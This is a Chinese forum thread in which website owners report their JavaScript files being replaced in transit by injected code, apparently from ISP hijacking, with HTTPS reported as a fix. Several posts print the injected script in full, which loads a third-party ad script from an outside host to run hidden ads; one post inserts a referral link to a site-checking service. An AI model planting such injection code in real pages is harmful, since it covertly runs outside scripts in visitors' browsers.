网站被劫持

阿里云Windows2008 主机,使用的宝塔面板.
在网站根目录添加一个 index.html,一个basc.js 文件

index.html 内容
        <!DOCTYPE HTML>
        <html>
                <head>
                        <title>Test</title>
                        <script src="basic.js"></script>
                </head>
                <body>
                   Test
                </body>
        </html>
basc.js 内容
        console.log('123');
        
        
通过谷歌浏览器访问, F12审查元素, 切换为手机设备访问(如图)


多次刷新 发现    basc.js 内容 被替换为

!function(){var _cyd_location_url="http://www.域名.com/assets/js/index.js";var _cyd_target_url="http://cdn.5bong.com/pop/v1.js?bt=1";var _cyd_mark_tag=_cyd_location_url.indexOf("?")>-1?"&":"?";var _cyd_f_param=_cyd_mark_tag+"bt="+Date.parse(new Date());if(document.readyState=="complete"){var _cyd_location_script=document.createElement('script');_cyd_location_script.src=_cyd_location_url+_cyd_f_param;var _cyd_target_script=document.createElement('script');_cyd_target_script.src=_cyd_target_url;var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(_cyd_location_script,s);s.parentNode.insertBefore(_cyd_target_script,s)}else{document.write('<script src="'+_cyd_location_url+_cyd_f_param+'"><\/script>');document.write('<script src="'+_cyd_target_url+'"><\/script>')}}();

美化后代码如下:
        function() {
                var _cyd_location_url = "http://www.域名.com/assets/js/index.js";
                var _cyd_target_url = "http://cdn.5bong.com/pop/v1.js?bt=1";
                var _cyd_mark_tag = _cyd_location_url.indexOf("?") > -1 ? "&" : "?";
                var _cyd_f_param = _cyd_mark_tag + "bt=" + Date.parse(new Date());
                if (document.readyState == "complete") {
                        var _cyd_location_script = document.createElement('script');
                        _cyd_location_script.src = _cyd_location_url + _cyd_f_param;
                        var _cyd_target_script = document.createElement('script');
                        _cyd_target_script.src = _cyd_target_url;
                        var s = document.getElementsByTagName("script")[0];
                        s.parentNode.insertBefore(_cyd_location_script, s);
                        s.parentNode.insertBefore(_cyd_target_script, s)
                } else {
                        document.write('<script src="' + _cyd_location_url + _cyd_f_param + '"><\/script>');
                        document.write('<script src="' + _cyd_target_url + '"><\/script>')
                }
        }();
        
然后就是加载一段JS和网页,  偷偷跑着刷广告.

这难道是 宝塔的后门吗?

被劫持了?有用HTTPS测试吗？

误会 宝塔面板了，
是被劫持了，河南联通的网络 有问题
发现
114DNS官网  http://www.114dns.com/
天涯论坛   http://bbs.tianya.cn
都有同样的问题

把本地DNS 修改为 阿里云的 和 114 的还是不能解决

使用https 目前测试正常

投诉到工信部~会解决的

检测网站是否被劫持
域名是否被墙
DNS污染检测
网站打开速度检测
网站是否被黑
被入侵
被改标题
被挂黑链     http://www.iis7.com/b/wzjk/?inviteCode=496

我这边也出现了这个情况，一模一样。
不是被劫持。
很有可能是服务器被挂马了。
目前还没有找到挂马文件。。

网站js被替换为：

1. !function(){var _cyd_location_url="http://域名/WeChat.js";var _cyd_target_url="https://cdn.5bong.com/pop/v1.js?bt=1";var _cyd_mark_tag=_cyd_location_url.indexOf("?")>-1?"&":"?";var _cyd_f_param=_cyd_mark_tag+"bt="+Date.parse(new Date());if(document.readyState=="complete"){var _cyd_location_script=document.createElement('script');_cyd_location_script.src=_cyd_location_url+_cyd_f_param;var _cyd_target_script=document.createElement('script');_cyd_target_script.src=_cyd_target_url;var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(_cyd_location_script,s);s.parentNode.insertBefore(_cyd_target_script,s)}else{document.write('<script src="'+_cyd_location_url+_cyd_f_param+'"><\/script>');document.write('<script src="'+_cyd_target_url+'"><\/script>')}}();

复制代码

主要是通过这个js刷广告：

1. https://cdn.5bong.com/pop/v1.js?bt=1

复制代码